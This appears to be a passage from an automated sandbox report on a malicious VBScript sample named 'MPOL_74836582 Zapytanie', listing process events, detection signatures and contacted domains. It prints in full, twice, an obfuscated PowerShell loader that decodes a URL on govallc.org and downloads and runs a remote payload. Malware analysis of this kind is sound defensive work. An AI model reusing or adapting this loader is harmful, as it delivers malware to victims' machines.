idtnM,dheCervs oma.Sou.aAsylsCan iOstr ';$Croises=Jus ' ,kr>Nerv ';$Andantinoer=Jus ' ResIAnamESo iXViva ';$Befogging='Italiana';$Recarbon='\Arkaiserings.Slg';Hyperromanticism140 (Jus 'Forh$ empgPr,clAg eofrueBOms.AM.nolOver:NiveA pidnVagta ispCThyrl DisiFrihsSegriOu,dsKnu,1Vrkb4E gl7,arv=A ab$ s eE.uniNCog VAnt :Ae iaForfpTeraPKer dNoncaConttWienAluge+Arv,$,ambrStteeExcuc issAkontr S,kb MayoWeasNStub ');Hyperromanticism140 (Jus ' hec$DefeG Ln Lr ckONonaB ForaTe.eLBrn :GenoAGrafuAlleT MulOSa.se Co.T SvrtRuboE Bra= P s$UnsoM ShaiEme.LStyrjNulsfAarro M,mrdoryASyndn InbDAnlirSpe,iNasaN KomG VodeyustRInflS Spy.Sprjs xaP SmrlVa dIBisetSub (Well$ PeacJeweRRetso S,di NitsEsseEUpshsSydv)Arb ');Hyperromanticism140 (Jus 'Ndp [Cyc n.ndiEOothT S,j.Ger.sskovEUd frRespvProhI U fCfedteSalvPPhylOSan.i Op.nS.orT antmSpilaFjolN lauaR liGUprue ChoRTuli]W nn:t.ed:Ansts heeBageCisskU MyorHeltI rustUrotyUdviPSc dr.ygaOUndstOro.O CryC idO talLHove Da a=Steg Kaff[H moNBesgETutotBird. ebySGerfEUni CSweauDyserOverIHomoT Picy,efrpLnkorUdstoMaantBiltORomaCafs.oC holCondTKavey KolPRdtue S,e]Tui :Hypo:smalTamucLKo ps N n1Nond2 Dep ');$Miljforandringers=$Autoette[0];$Panspermic=(Jus 'R od$Trepg alaLU.caoElecBEuryaGsteLFisk:spidTBstrEKloasGruntHikkUBeelD FesSUdskKC ieRUdp iSv.jvUalmN Madi CebnStruGPoinSW.ntf TraAfredcVindI mpelgr nIO det Unoe PretMeine.urunAmph=UzbenneoneBolsWSlen- AtmOmaliBCaatjSekaeKr mcAartTDimi .eadS ilYBlabSAfstTAsseeYallM Vrd.TripN Chee Sert ask.assuwTrameWoo.bFodecO chlPeroISp aeUd,anVasotThie ');Hyperromanticism140 ($Panspermic);Hyperromanticism140 (Jus 'Terp$NeksT Gr,eLydss Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping aszzzw_6777.6777.6777.677e Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#svigagtige dimerised oprettelsesdokumenter rhinodynia zetas #>;$desiringly147='grunted';<#iltelegrammet hemispheral acromelalgia deboshed corruptibleness #>;$masonically=$nervepatientens+$host.ui;if ($masonically) {$laengst++;}function jus($hovekatalogers){$saneringsmodent=$skrmplante+$hovekatalogers.'length'-$laengst; for( $isttes=4;$isttes -lt $saneringsmodent;$isttes+=5){$skovsvinerier++;$snrer210+=$hovekatalogers[$isttes];$skuebrdene='kundemdets';}$snrer210;}function hyperromanticism140($regelfaststtelsers){ & ($andantinoer) ($regelfaststtelsers);}$courtezanry=jus ' owlmbov.o unlz r niflusldiasl anoaday /non. ';$courtezanry+=jus ' ad5thro. ska0 adr dece(is.awrotaiinvanrad.dbracogawaw m,rsfren ch,pnondst,til rose1skr,0ungd. b t0ig,i;str parwnoneitra nfar,6krem4s,je; ber mot x ka.6s,at4ha,l;cykl baghrafstv itr: hol1 all3 it1 or.fugl0 ava)stri fyrigstegegenocomgakignao rre/as p2depr0 mis1calc0 spo0penk1side0 enf1retr weapfpropilaserremoe,kolfliv,obarbxblu /unf.1pol,3 unf1utrn. mb0bade ';$retspraksisens=jus 'kariu,rivsphytelet.rtana-unfra stygsmmeeborgntil tblac ';$miljforandringers=jus 'legahunivtenketkloapstats boo:recu/ergo/gae,gsolbohyd vfolkahumel ratlmahocfati.serpopaasrpitagbibe/r gnrbegae ird defnsta isamfnto lgeners indbf rsl.tatt .ydetr lr idtnm,dhecervs oma.sou.aasylscan iostr ';$croises=jus ' ,kr>nerv ';$andantinoer=jus ' resianameso ixviva ';$befogging='italiana';$recarbon='\arkaiserings.slg';hyperromanticism140 (jus 'forh$ empgpr,clag eofrueboms.am.nolover:nivea pidnvagta ispcthyrl disifrihssegriou,dsknu,1vrkb4e gl7,arv=a ab$ s ee.unincog vant :ae iaforfpterapker dnoncaconttwienaluge+arv,$,ambrstteeexcuc issakontr s,kb mayoweasnstub ');hyperromanticism140 (jus ' hec$defeg ln lr ckononab forate.elbrn :genoagrafuallet mulosa.se co.t svrtruboe bra= p s$unsom shaieme.lstyrjnulsfaarro m,mrdoryasyndn inbdanlirspe,inasan komg vodeyustrinfls spy.sprjs xap smrlva dibisetsub (well$ peacjewerretso s,di nitsesseeupshssydv)arb ');hyperromanticism140 (jus 'ndp [cyc n.ndieootht s,j.ger.sskoveud frrespvprohi u fcfedtesalvpphylosan.i op.ns.ort antmspilafjoln lauar liguprue chortuli]w nn:t.ed:ansts heebagecissku myorhelti rusturotyudvipsc dr.ygaoundstoro.o cryc ido tallhove da a=steg kaff[h monbesgetutotbird. ebysgerfeuni csweaudyseroverihomot picy,efrplnkorudstomaantbiltoromacafs.oc holcondtkavey kolprdtue s,e]tui :hypo:smaltamuclko ps n n1nond2 dep ');$miljforandringers=$autoette[0];$panspermic=(jus 'r od$trepg alalu.caoelecbeuryagstelfisk:spidtbstrekloasgrunthikkubeeld fessudskkc ierudp isv.jvualmn madi cebnstrugpoinsw.ntf traafredcvindi mpelgr nio det unoe pretmeine.urunamph=uzbenneonebolswslen- atmomalibcaatjsekaekr mcaarttdimi .eads ilyblabsafsttasseeyallm vrd.tripn chee sert ask.assuwtramewoo.bfodeco chlperoisp aeud,anvasotthie ');hyperromanticism140 ($panspermic);hyperromanticism140 (jus 'terp$nekst gr,elydss
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#svigagtige dimerised oprettelsesdokumenter rhinodynia zetas #>;$desiringly147='grunted';<#iltelegrammet hemispheral acromelalgia deboshed corruptibleness #>;$masonically=$nervepatientens+$host.ui;if ($masonically) {$laengst++;}function jus($hovekatalogers){$saneringsmodent=$skrmplante+$hovekatalogers.'length'-$laengst; for( $isttes=4;$isttes -lt $saneringsmodent;$isttes+=5){$skovsvinerier++;$snrer210+=$hovekatalogers[$isttes];$skuebrdene='kundemdets';}$snrer210;}function hyperromanticism140($regelfaststtelsers){ & ($andantinoer) ($regelfaststtelsers);}$courtezanry=jus ' owlmbov.o unlz r niflusldiasl anoaday /non. ';$courtezanry+=jus ' ad5thro. ska0 adr dece(is.awrotaiinvanrad.dbracogawaw m,rsfren ch,pnondst,til rose1skr,0ungd. b t0ig,i;str parwnoneitra nfar,6krem4s,je; ber mot x ka.6s,at4ha,l;cykl baghrafstv itr: hol1 all3 it1 or.fugl0 ava)stri fyrigstegegenocomgakignao rre/as p2depr0 mis1calc0 spo0penk1side0 enf1retr weapfpropilaserremoe,kolfliv,obarbxblu /unf.1pol,3 unf1utrn. mb0bade ';$retspraksisens=jus 'kariu,rivsphytelet.rtana-unfra stygsmmeeborgntil tblac ';$miljforandringers=jus 'legahunivtenketkloapstats boo:recu/ergo/gae,gsolbohyd vfolkahumel ratlmahocfati.serpopaasrpitagbibe/r gnrbegae ird defnsta isamfnto lgeners indbf rsl.tatt .ydetr lr idtnm,dhecervs oma.sou.aasylscan iostr ';$croises=jus ' ,kr>nerv ';$andantinoer=jus ' resianameso ixviva ';$befogging='italiana';$recarbon='\arkaiserings.slg';hyperromanticism140 (jus 'forh$ empgpr,clag eofrueboms.am.nolover:nivea pidnvagta ispcthyrl disifrihssegriou,dsknu,1vrkb4e gl7,arv=a ab$ s ee.unincog vant :ae iaforfpterapker dnoncaconttwienaluge+arv,$,ambrstteeexcuc issakontr s,kb mayoweasnstub ');hyperromanticism140 (jus ' hec$defeg ln lr ckononab forate.elbrn :genoagrafuallet mulosa.se co.t svrtruboe bra= p s$unsom shaieme.lstyrjnulsfaarro m,mrdoryasyndn inbdanlirspe,inasan komg vodeyustrinfls spy.sprjs xap smrlva dibisetsub (well$ peacjewerretso s,di nitsesseeupshssydv)arb ');hyperromanticism140 (jus 'ndp [cyc n.ndieootht s,j.ger.sskoveud frrespvprohi u fcfedtesalvpphylosan.i op.ns.ort antmspilafjoln lauar liguprue chortuli]w nn:t.ed:ansts heebagecissku myorhelti rusturotyudvipsc dr.ygaoundstoro.o cryc ido tallhove da a=steg kaff[h monbesgetutotbird. ebysgerfeuni csweaudyseroverihomot picy,efrplnkorudstomaantbiltoromacafs.oc holcondtkavey kolprdtue s,e]tui :hypo:smaltamuclko ps n n1nond2 dep ');$miljforandringers=$autoette[0];$panspermic=(jus 'r od$trepg alalu.caoelecbeuryagstelfisk:spidtbstrekloasgrunthikkubeeld fessudskkc ierudp isv.jvualmn madi cebnstrugpoinsw.ntf traafredcvindi mpelgr nio det unoe pretmeine.urunamph=uzbenneonebolswslen- atmomalibcaatjsekaekr mcaarttdimi .eads ilyblabsafsttasseeyallm vrd.tripn chee sert ask.assuwtramewoo.bfodeco chlperoisp aeud,anvasotthie ');hyperromanticism140 ($panspermic);hyperromanticism140 (jus 'terp$nekst gr,elydss Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1533092 Sample: MPOL_74836582 Zapytanie Pot... Startdate: 14/10/2024 Architecture: WINDOWS Score: 88 22 aszzzw_6777.6777.6777.677e 2->22 24 govallc.org 2->24 26 Yara detected Powershell download and execute 2->26 28 Potential evasive VBS script found (sleep loop) 2->28 30 Sigma detected: WScript or CScript Dropper 2->30 32 AI detected suspicious sample 2->32 8 wscript.exe 1 2->8         started        signatures3 process4 signatures5 34 VBScript performs obfuscated calls to suspicious functions 8->34 36 Suspicious powershell command line found 8->36 38 Wscript starts Powershell (via cmd or directly) 8->38 40 2 other signatures 8->40 11 cmd.exe 1 8->11         started        14 powershell.exe 14 46 8->14         started        process6 signatures7 42 Uses ping.exe to check the status of other devices and networks 11->42 16 conhost.exe 11->16         started        18 PING.EXE 1 11->18         started        20 conhost.exe 14->20         started        process8
No contacted IP infos

Contacted Domains

Name IP Active
aszzzw_6777.6777.6777.677e unknown unknown
govallc.org unknown unknown